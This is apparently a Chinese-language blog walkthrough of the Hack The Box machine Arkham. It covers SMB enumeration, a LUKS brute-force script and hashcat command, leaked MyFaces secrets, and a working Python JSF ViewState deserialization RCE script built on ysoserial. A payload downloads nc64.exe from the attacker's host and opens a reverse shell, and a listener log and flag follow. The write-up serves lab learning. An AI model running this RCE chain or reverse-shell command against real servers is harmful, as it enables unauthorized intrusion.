HTB-windows-Arkman

Posted on | In
Words count in article: 2k | Reading time ≈ 9

简介:
Arkman,中等难度靶机,通过SMB泄漏LUKS加密文件,利用hashcat或cryptsetup破解LUKS获得tomcat的备份配置文件,配置文件中泄露JSF加密算法涉及的相关信息,在8080端口发现使用JSF的地方,结合JSF反序列化RCE获取alfred权限,在batman用户的downloads文件夹中找到output的ost文件,利用readpst转换ost文件获得batman用户账号密码和反弹shell,利用batman用户权限挂载C盘查看root.txt。

工具:
smbclient、cryptsetup、hashcat、ysoserial、readpst

知识点:
LUKS加密文件、JSF加密算法、apache JSF RCE、ost文件

文章目录

  • 解密LUKS获取配置
  • 利用配置获取shell
  • 提权

解密LUKS获取配置

信息收集

nmap扫常见端口,80端口运行”Microsoft IIS httpd 10.0”服务,查维基百科后得知是win10、win2016或win2019中的一个,445端口存在共享,8080端口为http代理。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
$ nmap -sC -sV -oA Arkham/nmap/Arkham 10.10.10.130
# Nmap 7.70 scan initiated Tue Jul  9 22:27:13 2019 as: nmap -sC -sV -oA Arkham/nmap/Arkham 10.10.10.130
Nmap scan report for 10.10.10.130
Host is up (0.26s latency).
Not shown: 995 filtered ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
8080/tcp open  http-proxy
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 200
|     Accept-Ranges: bytes
|     ETag: W/"11382-1545655294000"
|     Last-Modified: Mon, 24 Dec 2018 12:41:34 GMT
|     Content-Type: text/html
|     Content-Length: 11382
|     Date: Tue, 09 Jul 2019 14:28:30 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Mask Inc.</title>
|     <meta name="description" content="A free responsive website template made exclusively for Frittt by Themesforce and Sarfraz Shaukat">
|     <meta name="keywords" content="website template, css3, one page, bootstrap, app template, web app, start-up">
|     <meta name="author" content="Themesforce and Sarfraz Shaukat for Frittt">
|     <link rel="icon" type="image/png" href="favicons/favicon-16x16.png" sizes="16x16">
|     <link rel="stylesheet" href="css/bootstrap.css">
|     <link rel="stylesheet" href="fonts/font-awesome-4.3.0/css/fon
|   RTSPRequest:
|     HTTP/1.1 400
|     Date: Tue, 09 Jul 2019 14:28:44 GMT
|_    Connection: close
|_http-title: Mask Inc.

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 22s, deviation: 0s, median: 22s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-07-09 22:29:21
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jul  9 22:29:54 2019 -- 1 IP address (1 host up) scanned in 161.38 seconds

通过smbmap -u "guest" -H 10.10.10.130发现”BatShare”、”IPC$”、”Users”三个共享目录,利用smbclient检查共享内容,找到appserver.zip文件,解压后获得backup.img文件,利用file查看是LUKS加密文件。

破解LUKS文件

靶机从LUKS中获取文件有三种方式:
1.LUKS是Linux Unified Key Setup的缩写,维基百科对LUKS的解释为:”LUKS是Clemens Fruhwirth于2004年创建的磁盘加密规范,最初用于linux中;LUKS实现了平台无关的标准磁盘加密格式,可以在各种工具中使用,促进了不同磁盘加密软件之间的兼容性和互操作性,确保他们都以安全和文档化的方式实现密码管理。”;了解了LUKS之后,需要考虑如何破解,hashcat支持破解LUKS,此外cryptsetup可以打开luks文件支持密码测试;利用rockyou.txt字典得到密码:”batmanforever”

cryptsetup破解脚本如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#!/usr/bin/python

from itertools import permutations
import subprocess
import sys


pass_file = sys.argv[1]
luks_file = "backup.img"
count =56431
total = 0

with open(pass_file, "rb") as f:
    lines = f.readlines()
    total = len(lines)
    lines = lines[count:]
    for line in lines:
        count += 1
        passwd = line.strip()
        print("Process %s:%s Trying %s..."%(count, total, passwd))
        r = subprocess.call('echo "%s" | cryptsetup luksOpen --test-passphrase %s' % (passwd, luks_file),shell=True, stdout=None, stderr=None)
        if r == 0:
            print("Password is %s" %(passwd))
            break

hashcat破解命令:hashcat -m 14600 -a 0 -w 3 backup.img /usr/share/wordlists/rockyou.txt -o luks_password.txt --force

2.利用binwalk发现文件中包含xml文档、pdf文件、图片文件:binwalk -e backup.img

3.利用strings获取xml

论坛上通过从rockyou.txt里构造小字典实现了快速破解,未掌握该方法,但思路很好:从靶机名、文件共享目录名中提取关键字bat、man、ark、arkman,更是有一个大神猜出了batman关键字,实现了快速破解。

最终从LUKS加密后的文件中得到如下配置:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<context-param>
<description>State saving method: 'client' or 'server' (=default). See JSF Specification 2.5.2</description>
<param-name>javax.faces.STATE_SAVING_METHOD</param-name>
<param-value>server</param-value>
</context-param>
<context-param>
<param-name>org.apache.myfaces.SECRET</param-name>
<param-value>SnNGOTg3Ni0=</param-value>
</context-param>
    <context-param>
        <param-name>org.apache.myfaces.MAC_ALGORITHM</param-name>
        <param-value>HmacSHA1</param-value>
     </context-param>
<context-param>
<param-name>org.apache.myfaces.MAC_SECRET</param-name>
<param-value>SnNGOTg3Ni0=</param-value>
</context-param>

利用配置获取shell

JSF ViewState

根据找到的配置确认是JSF,在google上找到一片讲如何利用JSF错误配置渗透的文章,从文章中了解到JSF存在JAVA反序列化的漏洞;结合在8080端口中发现的使用viewstates的接口,现在需要构造反弹shell的exp;(完成靶机时,卡在了这里,看到viewstates之后,不知道如何结合文章中的jsf错误配置进行rce,还以为需要解viewstates然后添加payload进去再加密,靶机下线之后从Ippsec和0xRick的wp上看到直接创建加密后的viewstates即可,另外Ippsec老哥对反序列化数据的分析方法很有用,建议去youtube学习)

利用ysoserial创建payload,然后发送http请求实现rce,本来是使用Myfaces1和Myfaces2创建的,后来一直无法执行,然后查看了0xRick老哥的wp,转为CommonsCollections5。payload为cmd.exe /c powershell -c Invoke-WebRequest -Uri "http://10.10.14.11:81/nc64.exe" -OutFile "C:\windows\system32\spool\drivers\color\nc.exe"cmd.exe /c "C:\windows\system32\spool\drivers\color\nc.exe" -e cmd.exe 10.10.14.11 1337,脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
#!encoding:utf-8
import pyDes
import base64
import hmac
from hashlib import sha1
import subprocess
import requests
from urllib import parse



url = 'http://10.10.10.130:8080/userSubscribe.faces'

def encrypt_sign(payload):
    key = b'JsF9876-'
    cipher = pyDes.des(key, pyDes.ECB, padmode=pyDes.PAD_PKCS5)
    enc_payload = cipher.encrypt(payload)
    hmac_sig = hmac.new(key, enc_payload, sha1)
    payload = enc_payload + hmac_sig.digest()
    payload = base64.b64encode(payload)
    return payload

def send_rce(payload):
    url = 'http://10.10.10.130:8080/userSubscribe.faces'
    data = {
            'j_id_jsp_1623871077_1:email' : 'test',
            'j_id_jsp_1623871077_1:submit' : 'SIGN UP',
            'j_id_jsp_1623871077_1_SUBMIT' : '1',
            'javax.faces.ViewState': payload
    }
    res = requests.post(url=url, data=data)
    return res.text

def create_payload(cmd):
    payload = "java -jar /opt/ysoserial/ysoserial-master-SNAPSHOT.jar CommonsCollections5 '{cmd}' > /tmp/payload.bin".format(cmd=cmd)
    print(payload)
    status, msg = subprocess.getstatusoutput(payload)
    if status == 0:
        f = open('/tmp/payload.bin', 'rb')
        data = f.read()
        f.close()
        return data
    else:
        return None


if __name__ == '__main__':
    while 1:
        cmd = input('cmd=> ')
        if cmd in [ 'quit', 'exit', 'q' ]:
            break
        payload = create_payload(cmd)
        if payload:
            payload = encrypt_sign(payload)
            print(payload)
            print(send_rce(payload))

关于payload,尝试了很多命令,最终还是只能用0xRick老哥wp里的,其他命令和目录尝试之后均不成功;最终拿到反弹shell,获取user.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
root@OSCP:~# nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.130] 49696
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\tomcat\apache-tomcat-8.5.37\bin>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : dead:beef::cd7b:2ab9:a1e0:21e3
   Link-local IPv6 Address . . . . . : fe80::cd7b:2ab9:a1e0:21e3%9
   IPv4 Address. . . . . . . . . . . : 10.10.10.130
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:febd:e2c6%9
                                       10.10.10.2

C:\Users\Alfred\Desktop>ipconfig && type user.txt
ipconfig && type user.txt

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : dead:beef::cd7b:2ab9:a1e0:21e3
   Link-local IPv6 Address . . . . . : fe80::cd7b:2ab9:a1e0:21e3%9
   IPv4 Address. . . . . . . . . . . : 10.10.10.130
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:febd:e2c6%9
                                       10.10.10.2
ba659321c89c48a3dcb915bc46d58071

提权

拿到user.txt后,尝试用PowerUp进行信息收集,但是powershell执行失败,无奈只能手工翻看,在batman用户目录中找到outlook的ost文件,利用readpst -rS alfred@arkham.local.ost转换之后获得一副图片,图片中记录这batman用户的密码;然后获取到batman用户的反弹shell,net user发现batman是管理员组成员,因此直接读取C:/Users/Administrator/Desktop/root.txt,发现访问被拒绝;这里本来通过runas提升权限后获取的,后来一直失败,最终还是利用0xRick的方法获取的root.txt

owefsad wechat
进击的DevSecOps,持续分享SAST/IAST/RASP的技术原理及甲方落地实践。如果你对 SAST、IAST、RASP方向感兴趣,可以扫描下方二维码关注公众号,获得更及时的内容推送。
0%